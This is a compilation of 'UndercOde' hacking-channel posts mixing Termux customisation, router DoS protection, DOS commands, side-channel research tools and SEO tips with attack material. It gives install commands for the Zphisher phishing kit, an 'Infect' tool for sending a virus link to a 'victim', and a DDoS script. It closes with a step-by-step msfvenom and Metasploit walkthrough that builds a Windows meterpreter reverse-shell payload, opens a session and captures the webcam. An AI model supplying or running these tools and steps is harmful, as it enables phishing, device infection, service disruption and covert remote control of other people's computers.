▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How design your termux Like Your Desktop Windows ?
T.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Open Termux and type :

pkg update && pkg upgrade && pkg install x11-repo && pkg install tigervnc openbox obconf xorg-xsetroot xcompmgr xterm polybar st zsh geany pcmanfm rofi feh neofetch htop vim elinks mutt git wget curl xfce4-settings

2) cd $HOME && git clone https://github.com/adi1090x/termux-desktop

3) Now go to the cloned directory termux-desktop and copy or move 'home' & 'usr' directories to /data/data/com.termux/files.

4) Now type:

>!cp -rf ./home /data/data/com.termux/files && cp -rf ./usr /data/data/com.termux/files
or

> mv -f ./home /data/data/com.termux/files && mv -f ./home /data/data/com.termux/files

5) Warning : I'm assuming you're doing this on a fresh termux install. If not so, please backup your files before running these command above. These commands will forcefully copy or move files in home & usr directory. So, before doing that, take a look inside the repo directories, and backup your existing config files (like .vimrc, .zshrc, .gitconfig, etc).


6) VNC Server Now, Let's configure the vnc server for graphical output. Run -
vncserver -localhost
At first time, you will be prompted for setting up passwords -
You will require a password to access your desktops.

7) Password:
Verify:

8) Would you like to enter a view-only password (y/n)? n
Note that passwords are not visible when you are typing them and maximal password length is 8 characters.
If everything is okay, you will see this message -

> New 'localhost:1 ()' desktop is localhost:1

9) Creating default startup script /data/data/com.termux/files/home/.vnc/xstartup
Creating default config /data/data/com.termux/files/home/.vnc/config

10) Starting applications specified in /data/data/com.termux/files/home/.vnc/xstartup

11) Log file is /data/data/com.termux/files/home/.vnc/localhost:1.log
It means that X (vnc) server is available on display 'localhost:1'.

12) Finally, to make programs do graphical output to the display 'localhost:1', set environment variable like shown here (yes, without specifying 'localhost'):
export DISPLAY=":1"

13) You may even put this variable to your bashrc or profile so you don't have to always set it manually unless display address will be changed.
Now You can start the vnc server by,
vncserver

14) And to stop the server, run -
vncserver -kill :1
VNC Client Now you need a vnc client app to connect to server. I'm using this Android VNC client: VNC Viewer (developed by RealVNC Limited). You can use TigerVNC if you're trying to connect to server by a computer (Windows or Linux).

15) Determine port number on which VNC server listens. It can be calculated like this: 5900 + {display number}. So for display 'localhost:1' the port will be 5901.

16) Now open the VNC Viewer application and create a new connection with the following information (assuming that VNC port is 5901) - EXAMPLE:
Address:
127.0.0.1:5901

Name:
Termux

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Termux tool Zphisher is an upgraded form of Shellphish.
Fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


1) apt update

2) apt install git php openssh curl -y

3) git clone https://github.com/htr-tech/zphisher

4) cd zphisher

5) chmod +x zphisher.sh

6) bash zphisher.sh

🦑Or ; Use Single Command

> apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh

🦑Features :


1) Latest Login Pages

2) New Instagram Auto Follower Page

3) All types of Erros Fixed


Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A new fun way to send virus to your victim from just link in termux
t.me/UnderCodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt-get update -y

2) apt-get upgrade -y

3) pkg install python -y

4) pkg install python2 -y

5) pkg install git -y

6)pip install lolcat

7) git clone https://github.com/noob-hackers/Infect

8) ls

9) cd infect

10) ls

11) bash infect.sh

🦑How it works ?


Infect :

1) From this option you will get link of virus in your termux just send that link to your victim and let the fun happen.
Save :

2) From this option you can repair damaged device of your victm from that virus by just installing this anti-virus in his device.

3)From this option you can update the infect script.
Exit :

4) From this option you can exit from infect tool

🦑Tested by UndercOde on


Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Termux styling

> T Style is a tool to change Font & color Schemes of Termux App.
Instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


1) apt update

2) apt install git -y

3) git clone https://github.com/htr-tech/tstyle

4) cd tstyle

5) bash setup.sh

> type tstyle to run this tool.

🦑 Or ; Use Single Command
apt update && apt install git -y && git clone https://github.com/htr-tech/tstyle && cd tstyle && bash setup.sh && tstyle

🦑Features :

> Latest Fonts & Themes !

>Full Offline

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Dos Protection :
>How to protect the network from cyber attacks of the Wi-Fi Routers (new logo)?
t.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> SPI (Stateful Packet Inspection) Firewall and DoS (Denial of Service) Protection protect the router from cyber attacks.

> The SPI Firewall can prevent cyber attacks and validate the traffic that is passing through the router based on the protocol. This function is enabled by default, and it’s recommended to keep the default settings.

>The DoS Protection can protect your home network against DoS attacks from flooding your network with server requests.

🦑 Follow the steps below to configure DoS Protection.

1) Log in to the web-based interface of the router

2) Go to Advanced > Security > Settings.

3) Enable DoS Protection.

4) Set the level (Off, Low, Middle or High) of protection for ICMP-FLOOD Attack Filtering, UDP-FlOOD Attack Filtering and TCP-SYN-FLOOD Attack Filtering.

• ICMP-FLOOD Attack Filtering - Enable to prevent the ICMP (Internet Control Message Protocol) flood attack.

• UDP-FlOOD Attack Filtering - Enable to prevent the UDP (User Datagram Protocol) flood attack.

• TCP-SYN-FLOOD Attack Filtering - Enable to prevent the TCP-SYN (Transmission Control Protocol-Synchronize) flood attack

5) If you want to ignore the ping packets from the WAN port, select Ignore Ping Packet From WAN Port; if you want to ignore the ping packets form the LAN port, select Ignore Ping Packet From LAN Port.

6) Click Save.

That All !

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How does DoS protection work?
Instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) A “denial-of-server” attack is an explicit attempt to deny legitimate users from using a service or computer resource.

2) DoS/DDoS attempts to reach below three goals to make victim/system/server fail to provide service.

3) Make victim/system too busy to provide service

4) Occupy LAN bandwidth of victim/system

5) Occupy WAN bandwidth of victim/system

🦑EXAMPLE :

ASUS router uses following methods to detect suspicious attack.

1) SYN-Flooding Protection : Only allow one TCP/SYN packet to pass per second.

2) Port Scanner Protection : Protect router from port scanning via external port scan tool

3) Ping of Death : Only allow one ICMP packet(type 8) to pass per second or drop the length of ICMP packet over 65535.

4) Enable DoS protection feature can filter suspicious or unreasonable packets to prevent from flooding the network with large amounts of fake traffic.

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How and what is Dos Attack ?

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable
by overwhelming it with traffic from multiple sources. They target a wide variety of important resources from banks to news websites, and present a major challenge to making sure people can publish and access important information
t.me/UndercODEtESTING

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) git clone https://github.com/Ha3MrX/DDos-Attack

2) cd DDos-Attack

3) chmod +x ddos-attack.py

4) python ddos-attack.py

🦑Works on :

>Kali

> Debian

> ubanto

> rooted Termux( major android versions)

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Windows All DoS Commands :
instagram.com/UndercOdeTestingCompany

help
List commands (only in DOS versions 5 or later).
help command See help for the DOS command.

command /?
List switches for the DOS command.

path=c:\windows ; c:\dos
Specify in which directories DOS searches for commands or programs.

prompt $p$g
Make the DOS prompt display the current directory.

dir
List files in the current directory in one column.

dir /w List files in five columns.

dir /p
List files one page at a time.

dir *.ext
List all files with an .ext extension.

dir z???.ext
List files with .ext extensions that have four letters and start with z (where

z is a character of your choice).

dir file.ext /s
Search for the file.ext in the current directory and all subdirectories under the current directory; most useful if the current directory is the root (i.e., C:\).

type file.ext
View the contents of the text file file.ext.

edit file.ext
Use the DOS editor to edit the file file.ext.
a: Change to the a: drive.

md c:\diry
Make a new subdirectory named diry in the c:\ directory.

cd c:\diry Change to subdirectory diry.

rd c:\diry
Remove the existing subdirectory named diry.

del file.ext Delete a file named file.ext.
ren file1 file2 Rename file file1 to file2.

copy file1 file2 Copy file file1 to file2.

verify on
Turn on verification of copy commands.
verify off
Turn off verification of copy commands.

xcopy diry1 diry2 /s
Copy all files and subdirectories in directory diry1 to diry2.

xcopy diry1 diry2 /p
Ask for confirmation of each file before copying it from diry1 to diry2.

diskcopy a: b:
Duplicate a disk using two floppy drives.

diskcopy a: a:
Duplicate a disk using the same floppy drive.

format a: Format a disk in drive a: .
format a: /s

Format a bootable disk (include system files).
backup c:\diry\*.ext a:

Back up all files with the extension .ext in c:\diry\ to drive a: .
backup c:\ a: /s

Back up the entire c: drive to drive a:.
restore a:\ c:\diry\*.ext

Restore backed-up files with the extension .ext in drive a: to the c:\diry\ directory.

restore a: c:\ /s
Restore backed-up files and subdirectories from drive a: to c:\.

ver Check the version of DOS.
time

Check or correct the system time.
date
Check or correct the system date.
cls Clear the screen.

scandisk
Scan and check drive c: for errors. ScanDisk replaces chkdsk (see below) on DOS version 6.0 and above (including Windows 95).

chkdsk
Check disk and memory usage of the current disk.

chkdsk /f
Fix errors reported by chkdsk.
chkdsk file.ext Check a particular file.

chkdsk a:
Check a particular drive (in this case, a floppy in the a: drive).
mem Check memory usage.

@ Steave
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How & What is side-channel attack ?
t.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Enter side channel attacks. A side channel attack breaks cryptography by using information leaked by cryptography, such as monitoring the electromagnetic field (EMF) radiation emitted by a computer screen to view information before it's encrypted in a van Eck phreaking attack,

> aka Transient Electromagnetic Pulse Emanation STandard (TEMPEST). Other well-known side channel attacks include spying on the power consumption of an electronic device to steal an encryption key, or acoustic attacks

>that record the sound of a user's key strokes to steal their passphrase.

🦑Examples :

> A cache side-channel attack works by monitoring security critical operations such as AES T-table entry[3][4][5] or modular exponentiation multiplicand accesses.[6] Attacker then is able to recover the secret key depending on the accesses made (or not made) by the victim, deducing the encryption key. Also, unlike some of the other side-channel attacks, this method does not create a fault in the ongoing cryptographic operation and is invisible to the victim.

> cache-based vulnerabilities have been discovered in CPUs (dubbed Meltdown and Spectre), which allow an attacker to leak memory contents of other processes and the operating system itself.

> A timing attack watches data movement into and out of the CPU or memory on the hardware running the cryptosystem or algorithm. Simply by observing variations in how long it takes to perform cryptographic operations, it might be possible to determine the entire secret key. Such attacks involve statistical analysis of timing measurements and have been demonstrated across networks.[7]

> A power-analysis attack can provide even more detailed information by observing the power consumption of a hardware device such as CPU or cryptographic circuit. These attacks are roughly categorized into simple power analysis (SPA) and differential power analysis (DPA).

> Fluctuations in current also generate radio waves, enabling attacks that analyze measurements of electromagnetic emanations. These attacks typically involve similar statistical techniques as power-analysis attacks.

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 updated Ledger's Advanced Side-Channel Analysis Repository
twitter.com/UndercOdeTc

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Ledger-Donjon/lascar

2) cd lascar

3) python3 setup.py install --user

Build the doc:

4) cd docs/

5) make html

🦑Features :

1) Openness: lascar library is open source and is intended to facilitate attack implementations, and exchange between users. Contributing to lascar is strongly encouraged.

2) Simplicity: For basic state of the art attacks, the corresponding lascar script shall stay basic

3) Compatibility: Since lascar relies on mainstream python libraries (numpy, sklearn, keras): lascar is easily deployable

4) Flexibility: Implement your own classes (for your already existing trace format, your specific attacks, the way you want your output to be...), use different languages (provided that you bind them with python),...

🦑Requirements :

1) numpy

2) scipy

3) matplotlib: for curve visualization

4) vispy: for curve visualization

5) sklearn: for machine learning

6) keras: for deep learning

7) tensorflow: keras backend

8) h5py: for data storage

9) progressbar2

10) pytest

11) numba

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Radio Side-Channels in Mixed-Signal Chips 2019 updated :
full guide :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/eurecom-s3/screaming_channels

2) cd screaming_channels

3) make GNU_INSTALL_ROOT=$GCC_PATH/gcc-arm-none-eabi-7-2017-q4-major/bin/ -C blenano2/blank/armgcc

4) To program the device, we can simply copy the binary there. (Depending on your operating system, the device might be mounted elsewhere or require a manual mount command.)

> cp blenano2/blank/armgcc/_build/nrf52832_xxaa.hex /media/$USER/DAPLINK/

5) Finally, we can connect to the device (you may want to add a USB rule for it).

> minicom -D /dev/ttyACM0

6) To start, you first have to install the "Screaming Channels tools". You can use

> cd experiments/src/

> python2 setup.py develop --user

or

> cd experiments/src/
> python2 setup.py install [--user]

7) Try the command at a distance of some centimeters, say 10 cm, and you should be able to observe a clean AES trace. (The same command should work also at several meters, but in this case you may need a better antenna, amplifiers, some more careful tuning of the configuration, etc. So we suggest to start with something simple and well under control, without other devices on the same channel, etc.)

8) mkdir traces/example_collection_data

9) cd experiments

10) sc-experiment --radio=HackRF --device=/dev/ttyACM0 collect config/example_collection_plot.json ../traces/example_collection_data --plot


🦑Tested by UndercOde:

> Debian

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Increase tRaffic on your site ??
instagram.com/UndercOdeTestingCompaNY

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Expand the semantic core

Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of “one key = one article”.

2) Select keys that are relevant to the interests of the target audience

For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?

How to increase traffic to the site using content marketing?

3) Blog

Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.

4) A good blog - a regular blog

The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.

5) Observe the release time of materials

Over time, the blog will have a permanent audience. And it’s very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.

Method number 6 Release materials unique in meaning

This is the key to the popularity of your blog. Think about how many people want to read the article “How to choose a window installation company?” If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.

7) Create viral content

Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.

8) Follow the rules for writing articles

Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.

9 ) cause an emotional response

Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.

10) Publish ratings

In the case of windows, the theme may be: “TOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.” If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.


11) Work with experts

The expert’s unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.

12 ) Make a selection of popular posts

Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the site’s behavioral indicators.

13) Post answers to interesting posts

Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.

14) Research the market and publish the resultant

Explore the market in affordable ways. Publish the results in white paper format - this is a small instruction book to solve a specific problem.

15) Publish different content

Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.

16) Learn competitors

See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.

17) Expand the theme of the blog

For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.

18) Announce interesting publications

Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.

19) Use Google Alerts

Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.

20) Run the forum

This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.

21) Use guest posting

Just forget the “links for links” tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.

22) Answer the questions

Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.

23) Comment

Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).

24) Social aggregators

Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.

25) Collect reviews

Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.

Increase website traffic through social networks

26) Be everywhere

Official pages in all popular social media are a must have for any business or self-employed person who provides online services.

27) Arm yourself with photo content

Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.

28) Business social networks

Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didn’t reach our edges right away.

29) Full announcements

The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.

30) Use the fruits of someone else's work

Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.

31) The best thing is to fix

Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.

32) CTA button on Facebook

The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.


written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTestingCompany

🦑VULNERABILITY OF THE SITE CODE

1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.

2) RCE - Remote code execution . Remote code execution on the server.

3)PHP Injection . Execution of arbitrary PHP code.

4) SQL injection . Embedding arbitrary code in an SQL query.

5) XP ath - injection . Embed arbitrary code in an XPath request.

🦑 Inclusions:

1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.

> RFI Remote file include . Inclusion of a remote file.

> LFI - Local file include . Connect, execute, or read local files on the server.

> PHP include . Including a remote PHP file.

> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victim’s browser

> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).

1) XSS attack . Cross Site Sсrіrting - cross-site scripting.

2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.

3) Phishing attack . Fishing - Phishing attack - fake site pages.

4) Incorrect publication of the site on the server. Publication errors.

5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.

6) Such errors that directly affect the security of the site are:

> Open directories with system files.
> Open access and the ability to execute system files interacting with a

> file system or databases.

>System archives, site backups that are in the public domain.

> Public dump database files.

> Open access to .svn or .git index files.

🦑Site administration errors:

1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.

2) Such passwords are simply selected by attackers using special programs.

3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.

4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.

🦑VULNERABILITY OF THE SERVER

1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.

2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the site’s security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.

I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.

Written bY UndercOde
🦑 don t clone our tutorials Without Permission To Prevent damage 🦑

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

T.me/UndercOdeTesting

# SUPPORT & SHARE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Load creation

Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .


root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

2) Run the mfsconsole command, which will launch the msf request.

root @ kali: # msfconsole

»...


Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit

= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]

msf>


3) For use, we used the following details:

Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#


Now give the following command in the msf line “ use exploit / multi / handler ”

msf> use exploit / multi / handler
msf exploit (handler)>


5) Then give the command “set payload windows / meterpreter / reverse_tcp” in the following line:

msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp


6) Now set the local IP and port using the lhost and lport commands, as shown below:

msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444


and finally use the command.

msf exploit (handler)> exploit

[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...

7) Now you need to execute the “program.exe” command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.

msf exploit (handler)> exploit

[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000

meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32


8) After you successfully receive the details, you can do more to use or get more detailed information using the “ help “ command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command “ webcam_snap ”is just like you can use many of the available options

E N J O Y BY U N D E R C O D E
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁